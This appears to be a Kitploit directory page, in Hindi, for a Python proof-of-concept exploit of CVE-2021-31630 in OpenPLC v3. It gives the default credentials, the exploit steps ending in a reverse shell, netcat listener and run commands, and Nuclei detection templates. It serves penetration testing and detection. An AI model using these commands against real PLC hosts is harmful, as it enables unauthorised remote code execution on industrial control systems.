Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OpenPLC-CVE-2021-31630-RCE | Kitploit
उपकरण/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OpenPLC v3 प्रमाणित RCE (CVE-2021-31630)

यह CVE-2021-31630 के लिए एक आधुनिक Python 3.13+ संगत प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो OpenPLC v3 में एक कमजोरी है जो एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण कोड वाली कस्टम हार्डवेयर परत अपलोड करने की अनुमति देती है, जिससे होस्ट पर रिमोट कोड निष्पादन (RCE) होता है।

मूल कमजोरी की खोज और सलाह फेलिप ओलिवेरा द्वारा। यह पुनः कार्यान्वयन और आधुनिकीकरण httpx, CLI टूलिंग, लॉगिंग और सुरक्षित पहचान तकनीकों का उपयोग करता है।

एक्सप्लॉइट अवलोकन

  • कमजोरी: CVE-2021-31630
  • घटक: OpenPLC v3 वेब सर्वर
  • प्रभाव: प्रमाणित रिमोट कोड निष्पादन
  • डिफ़ॉल्ट क्रेडेंशियल्स: openplc:openplc

एक्सप्लॉइट प्रवाह

  1. वैध क्रेडेंशियल्स का उपयोग करके लॉगिन करें
  2. दुर्भावनापूर्ण C कोड को कस्टम हार्डवेयर परत के रूप में अपलोड करें
  3. संकलन को ट्रिगर करें
  4. निष्पादन को ट्रिगर करें (वैकल्पिक)
  5. रिवर्स शेल कनेक्शन प्राप्त करें

उपयोग

  1. एक लिसनर शुरू करें:
root@kitploit:~
nc -lvnp 9001
  1. एक्सप्लॉइट चलाएँ:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

वैकल्पिक फ्लैग्स:

  • -u उपयोगकर्ता नाम (डिफ़ॉल्ट: openplc)
  • -p पासवर्ड (डिफ़ॉल्ट: openplc)
  • -t टाइमआउट सेकंड में (डिफ़ॉल्ट: 20)

विशेषताएँ

  • Python 3.13+ के साथ संगत
  • httpx के साथ निर्मित
  • साफ आउटपुट के लिए लॉगिंग समर्थन
  • आसान पुन: उपयोग के लिए मॉड्यूलर फ़ंक्शन
  • Nuclei पहचान टेम्पलेट शामिल हैं

Nuclei पहचान टेम्पलेट्स

  1. डिफ़ॉल्ट क्रेडेंशियल्स जाँच
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. निष्क्रिय RCE कमजोरी जाँच
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

दूसरा टेम्पलेट लॉगिन करता है और एक हानिरहित पेलोड अपलोड + संकलन का प्रयास करता है ताकि संभावित कमजोरी की पुष्टि हो सके — बिना वास्तविक कोड निष्पादन को ट्रिगर किए।

शामिल फ़ाइलें

  • OpenPLC_CVE_2021_31630.py – Python 3.13+ एक्सप्लॉइट
  • nuclei-templates/openplc-default-login.yaml – डिफ़ॉल्ट क्रेडेंशियल्स पहचानें
  • nuclei-templates/openplc-authenticated-rce-check.yaml – कमजोर व्यवहार को सुरक्षित रूप से पहचानें

⚠️ कानूनी / नैतिकता

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। सिस्टम स्वामी से स्पष्ट अनुमति के बिना उपयोग न करें।

टूल डाउनलोड करें